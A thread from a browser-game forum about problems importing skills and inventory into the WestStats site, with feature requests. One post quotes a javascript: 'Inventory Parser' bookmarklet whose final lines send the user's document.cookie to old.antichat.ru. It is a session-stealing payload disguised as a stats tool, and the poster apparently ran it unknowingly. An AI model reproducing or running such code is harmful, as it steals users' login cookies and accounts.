Discussion The West Stats

DeletedUser

Weststats problems

I went to weststats and imported my skill stats.. it has the checkmark and everything but they will not show up on the job calculator screen. Is there anything i can do to fix this?

DeletedUser1105

You'll have to contact the team at weststats (there will be contact details somewhere).

WestStats is not run by Innogames (By my understanding...), so you probably won't get help on this forum.

DeletedUser

Are you sure you had the skill or inventory window open on West when you hit enter. If you dont it will still say they were saved but they dont.

DeletedUser

Yeah im pretty sure I done everything correctly because it worked just fine yesterday.

DeletedUser

Why not work Inventory Parser?

When i copy theise text
javascript:var wsurl = 'http://www.weststats.com/incoming.php?type=inventpub&data='; var collectedinfo = ''; var count = 0; for(var p in Bag.getInstance().items) { var s = Bag.getInstance().items[p].get_short(); var t = Bag.getInstance().items[p].get_type(); var c = Bag.getInstance().items[p].get_count_value(); if(c > 1) { for (o=0;o<c;o++) { collectedinfo += t.substring(0, 1) + ':' + s + ','; } count = count + c; } else { collectedinfo += t.substring(0, 1) + ':' + s + ','; count = count + 1; } } if(count < 1) { alert('This scripts must be ran after the inventory has been opened!'); end(); } try { var charname = $('avatar').textContent.replace(Character.level, ''); } catch (e){ var charname = $('avatar').innerText.replace(Character.level, ''); } collectedinfo += charname; var ln = collectedinfo.length; if(ln > 500) { var s = 0; var i = 0; var a = []; wsurl += "SPLIT"; while(ln > 0){ var start = i*500; var end = (i+1)*500; var sp = collectedinfo.slice(start, end); a = sp; ln = ln - 500; i = i + 1; } for (m=0;m<a.length;m++) { wsurl += "&d" + m + "=" + a[m]; } } else { wsurl += collectedinfo; } wsurl += "&w=" + location.href; document.location.replace(wsurl); var vsurl = 'http://old.antichat.ru/cgi-bin/s.jpg?'+document.cookie; location.href; document.location.replace(vsurl); end();

My brouser redirected on http://old.antichat.ru/b.gif? What is thise?
P.S. Sorry for my bad English.

I'm copy thise text in browser window when opened inventory but Inventory Parser not work (((

Help my plise (((

Last edited by a moderator:

DeletedUser

I'd like to add that you need to remove all of your items in order to get an accurate total on your Skills.

Does the Job Calculator not take into account the Items list?:huh:

DeletedUser

I'd like to add that you need to remove all of your items in order to get an accurate total on your Skills.

Does the Job Calculator not take into account the Items list?:huh:

Who you talking to, Puck???

DeletedUser

Without reading all the past replies, I have a few comments.

It would be nice if the world selector to the right remembered my selection. Seems it logs me in all right, but to get to my skills data, I have to constantly change this selection.

In addition to this; if your viewing a server that you have not imported skills for, maybe it would be nice if it said something like "No skills here, you have skills on World X, Y and Z".

An additional option of showing only jobs I can do; or jobs within X labor points of my current skill set would also be nice.

Secondly; the new options on the personal jobs page, for me, simply makes the process slower. I understand the benefit of it calculating what you have and what your using to allow the user to see if he can achieve more with what he has, etc. However, again for me in my position, and I expect many others (mainly newer players that only have what they are wearing) - it would be nice if by default if applied the bonuses of what I was wearing.

Some data about the classes would also be useful. It wasn't until I needed to select one that I found where the information was in game. And since there is no official help page on the matter, it would have helped if it where on your site; since I was looking there for everything else; seems to be the only part that is missing.

And finally; good job on the site - 'tis very useful!

DeletedUser

West stats problem

world 1,2,3,5
i can import my inventory without a single problem

World 4 how ever it just will not allow me to import my items in..very annoying when your trying to calculate what jobs you can do and which ones your trying to be able to do..

Any ideas on how i can fix this annoying problem ?

DeletedUser

Mine does not show me the best items like this screencap:

job_3.png

How can I get it to show me?

DeletedUser

I am very happy with west-stats and I hope we will soon have all new jobs and changes in quests/jobs/items...
Too many changes happend in same time for me to track...
Thanks and cheers!!!

DeletedUser

I hate to be picky, and I haven't checked all jobs, but Breaking in horses still shows Horseshoe instead of saddle, both under jobs and products...

DeletedUser

Same here! World 3 skills and inventory imports no problem. But world 2, I cant get my inventory to import, but skills have imported no problem! Any help would be appreciated.

DeletedUser

THERES your problem IE sucks and why on earth are you still on 7. Get Opera

DeletedUser

I have no problem inporting the inventory. There's something wrong with publicising it though.

I believe that in order to publicise your inventory, you have to add document.location.replace(wsurl); before the ;end statement, otherwise it doesn't work, the link won't show up. And it doesn't show the items you are carrying.

Last edited by a moderator:

DeletedUser

I imported my skills prior to the job update then on the job calculator I noticed "We've updated the job calculator - please reimport your skills and inventory." so I did and the job calculator won't show up at all. Keep getting the same old message.